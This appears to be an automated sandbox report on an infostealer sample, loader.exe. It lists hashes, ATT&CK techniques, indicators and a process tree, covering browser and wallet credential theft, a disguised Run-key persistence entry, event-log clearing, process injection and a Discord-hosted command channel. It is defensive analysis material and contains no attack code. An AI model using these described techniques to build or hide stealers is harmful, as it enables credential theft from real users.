0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

Analysis

max time kernel
150s
max time network
143s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
05-09-2024 11:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader.exe
Size

14.4MB
MD5

0b36da64b85e5abae7a93017d46dcce1
SHA1

40506f88be2a8f9fc03083f8d934b58fe22c3ae5
SHA256

0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903
SHA512

a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572
SSDEEP

196608:tzElGkSaXkbEzeMeHJJ4u/RVyjwnx4YpXNzP0nreN:5ElGbFbEzVO4u/Rg9YTzF

Score

10^/10

credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4068 created 4020	4068	WerFault.exe	118

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

description	pid	Process	procid_target
PID 904 created 3260	904	.exe	52
PID 904 created 3260	904	.exe	52
PID 904 created 3260	904	.exe	52
PID 904 created 3260	904	.exe	52
PID 904 created 3260	904	.exe	52
PID 4108 created 3260	4108	updater.exe	52
PID 4108 created 3260	4108	updater.exe	52
PID 4108 created 3260	4108	updater.exe	52
PID 2128 created 4020	2128	svchost.exe	118
PID 4108 created 3260	4108	updater.exe	52
PID 4108 created 3260	4108	updater.exe	52
PID 4108 created 3260	4108	updater.exe	52

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3732	powershell.exe
3088	powershell.exe
388	powershell.exe
2596	powershell.exe
3408	powershell.exe
3752	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 2 IoCs

pid	Process
904	.exe
4108	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\WindowsSecurity.exe"	loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	discord.com
3	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 904 set thread context of 2148	904	.exe	105
PID 4108 set thread context of 2608	4108	updater.exe	122
PID 4108 set thread context of 2796	4108	updater.exe	125
PID 4108 set thread context of 3472	4108	updater.exe	126

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4568	sc.exe
1420	sc.exe
2964	sc.exe
1532	sc.exe
5108	sc.exe
4124	sc.exe
1760	sc.exe
680	sc.exe
4020	sc.exe
4540	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4448	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1140	wmic.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	1	Go-http-client/1.1
HTTP User-Agent header	6	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 05 Sep 2024 11:31:54 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1725535913"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={08144BA5-6C9B-47EB-A265-0CA481A6CC31}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
2596	powershell.exe
2596	powershell.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
3732	powershell.exe
3732	powershell.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe
1548	loader.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1548	loader.exe
Token: SeIncreaseQuotaPrivilege	1876	wmic.exe
Token: SeSecurityPrivilege	1876	wmic.exe
Token: SeTakeOwnershipPrivilege	1876	wmic.exe
Token: SeLoadDriverPrivilege	1876	wmic.exe
Token: SeSystemProfilePrivilege	1876	wmic.exe
Token: SeSystemtimePrivilege	1876	wmic.exe
Token: SeProfSingleProcessPrivilege	1876	wmic.exe
Token: SeIncBasePriorityPrivilege	1876	wmic.exe
Token: SeCreatePagefilePrivilege	1876	wmic.exe
Token: SeBackupPrivilege	1876	wmic.exe
Token: SeRestorePrivilege	1876	wmic.exe
Token: SeShutdownPrivilege	1876	wmic.exe
Token: SeDebugPrivilege	1876	wmic.exe
Token: SeSystemEnvironmentPrivilege	1876	wmic.exe
Token: SeRemoteShutdownPrivilege	1876	wmic.exe
Token: SeUndockPrivilege	1876	wmic.exe
Token: SeManageVolumePrivilege	1876	wmic.exe
Token: 33	1876	wmic.exe
Token: 34	1876	wmic.exe
Token: 35	1876	wmic.exe
Token: 36	1876	wmic.exe
Token: SeIncreaseQuotaPrivilege	1876	wmic.exe
Token: SeSecurityPrivilege	1876	wmic.exe
Token: SeTakeOwnershipPrivilege	1876	wmic.exe
Token: SeLoadDriverPrivilege	1876	wmic.exe
Token: SeSystemProfilePrivilege	1876	wmic.exe
Token: SeSystemtimePrivilege	1876	wmic.exe
Token: SeProfSingleProcessPrivilege	1876	wmic.exe
Token: SeIncBasePriorityPrivilege	1876	wmic.exe
Token: SeCreatePagefilePrivilege	1876	wmic.exe
Token: SeBackupPrivilege	1876	wmic.exe
Token: SeRestorePrivilege	1876	wmic.exe
Token: SeShutdownPrivilege	1876	wmic.exe
Token: SeDebugPrivilege	1876	wmic.exe
Token: SeSystemEnvironmentPrivilege	1876	wmic.exe
Token: SeRemoteShutdownPrivilege	1876	wmic.exe
Token: SeUndockPrivilege	1876	wmic.exe
Token: SeManageVolumePrivilege	1876	wmic.exe
Token: 33	1876	wmic.exe
Token: 34	1876	wmic.exe
Token: 35	1876	wmic.exe
Token: 36	1876	wmic.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeIncreaseQuotaPrivilege	2432	wmic.exe
Token: SeSecurityPrivilege	2432	wmic.exe
Token: SeTakeOwnershipPrivilege	2432	wmic.exe
Token: SeLoadDriverPrivilege	2432	wmic.exe
Token: SeSystemProfilePrivilege	2432	wmic.exe
Token: SeSystemtimePrivilege	2432	wmic.exe
Token: SeProfSingleProcessPrivilege	2432	wmic.exe
Token: SeIncBasePriorityPrivilege	2432	wmic.exe
Token: SeCreatePagefilePrivilege	2432	wmic.exe
Token: SeBackupPrivilege	2432	wmic.exe
Token: SeRestorePrivilege	2432	wmic.exe
Token: SeShutdownPrivilege	2432	wmic.exe
Token: SeDebugPrivilege	2432	wmic.exe
Token: SeSystemEnvironmentPrivilege	2432	wmic.exe
Token: SeRemoteShutdownPrivilege	2432	wmic.exe
Token: SeUndockPrivilege	2432	wmic.exe
Token: SeManageVolumePrivilege	2432	wmic.exe
Token: 33	2432	wmic.exe
Token: 34	2432	wmic.exe
Token: 35	2432	wmic.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3260	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1548 wrote to memory of 1032	1548	loader.exe	80
PID 1548 wrote to memory of 1032	1548	loader.exe	80
PID 1548 wrote to memory of 1876	1548	loader.exe	81
PID 1548 wrote to memory of 1876	1548	loader.exe	81
PID 1548 wrote to memory of 2596	1548	loader.exe	82
PID 1548 wrote to memory of 2596	1548	loader.exe	82
PID 1548 wrote to memory of 1288	1548	loader.exe	83
PID 1548 wrote to memory of 1288	1548	loader.exe	83
PID 1548 wrote to memory of 2432	1548	loader.exe	85
PID 1548 wrote to memory of 2432	1548	loader.exe	85
PID 1548 wrote to memory of 1140	1548	loader.exe	86
PID 1548 wrote to memory of 1140	1548	loader.exe	86
PID 1548 wrote to memory of 3732	1548	loader.exe	87
PID 1548 wrote to memory of 3732	1548	loader.exe	87
PID 1548 wrote to memory of 3716	1548	loader.exe	88
PID 1548 wrote to memory of 3716	1548	loader.exe	88
PID 1548 wrote to memory of 1084	1548	loader.exe	89
PID 1548 wrote to memory of 1084	1548	loader.exe	89
PID 1548 wrote to memory of 5068	1548	loader.exe	90
PID 1548 wrote to memory of 5068	1548	loader.exe	90
PID 1548 wrote to memory of 4448	1548	loader.exe	91
PID 1548 wrote to memory of 4448	1548	loader.exe	91
PID 1548 wrote to memory of 2332	1548	loader.exe	92
PID 1548 wrote to memory of 2332	1548	loader.exe	92
PID 2332 wrote to memory of 4424	2332	powershell.exe	93
PID 2332 wrote to memory of 4424	2332	powershell.exe	93
PID 4424 wrote to memory of 2736	4424	csc.exe	94
PID 4424 wrote to memory of 2736	4424	csc.exe	94
PID 1548 wrote to memory of 904	1548	loader.exe	95
PID 1548 wrote to memory of 904	1548	loader.exe	95
PID 228 wrote to memory of 1420	228	cmd.exe	100
PID 228 wrote to memory of 1420	228	cmd.exe	100
PID 228 wrote to memory of 4540	228	cmd.exe	101
PID 228 wrote to memory of 4540	228	cmd.exe	101
PID 228 wrote to memory of 2964	228	cmd.exe	102
PID 228 wrote to memory of 2964	228	cmd.exe	102
PID 228 wrote to memory of 1532	228	cmd.exe	103
PID 228 wrote to memory of 1532	228	cmd.exe	103
PID 228 wrote to memory of 5108	228	cmd.exe	104
PID 228 wrote to memory of 5108	228	cmd.exe	104
PID 904 wrote to memory of 2148	904	.exe	105
PID 2148 wrote to memory of 624	2148	dialer.exe	5
PID 2148 wrote to memory of 688	2148	dialer.exe	7
PID 2148 wrote to memory of 980	2148	dialer.exe	12
PID 2148 wrote to memory of 428	2148	dialer.exe	13
PID 2148 wrote to memory of 500	2148	dialer.exe	14
PID 2148 wrote to memory of 908	2148	dialer.exe	15
PID 2148 wrote to memory of 1044	2148	dialer.exe	16
PID 2148 wrote to memory of 1068	2148	dialer.exe	17
PID 2148 wrote to memory of 1180	2148	dialer.exe	19
PID 2148 wrote to memory of 1192	2148	dialer.exe	20
PID 2148 wrote to memory of 1248	2148	dialer.exe	21
PID 2148 wrote to memory of 1296	2148	dialer.exe	22
PID 2148 wrote to memory of 1376	2148	dialer.exe	23
PID 2148 wrote to memory of 1412	2148	dialer.exe	24
PID 2148 wrote to memory of 1492	2148	dialer.exe	25
PID 2148 wrote to memory of 1620	2148	dialer.exe	26
PID 2148 wrote to memory of 1640	2148	dialer.exe	27
PID 2148 wrote to memory of 1684	2148	dialer.exe	28
PID 2148 wrote to memory of 1716	2148	dialer.exe	29
PID 2148 wrote to memory of 1752	2148	dialer.exe	30
PID 2148 wrote to memory of 1856	2148	dialer.exe	31
PID 2148 wrote to memory of 1868	2148	dialer.exe	32
PID 2148 wrote to memory of 1940	2148	dialer.exe	33

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1032	attrib.exe
1288	attrib.exe
1084	attrib.exe
5068	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:428

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1180
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:4108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1412
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1028

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2624

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3000

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:700

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3260
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2016
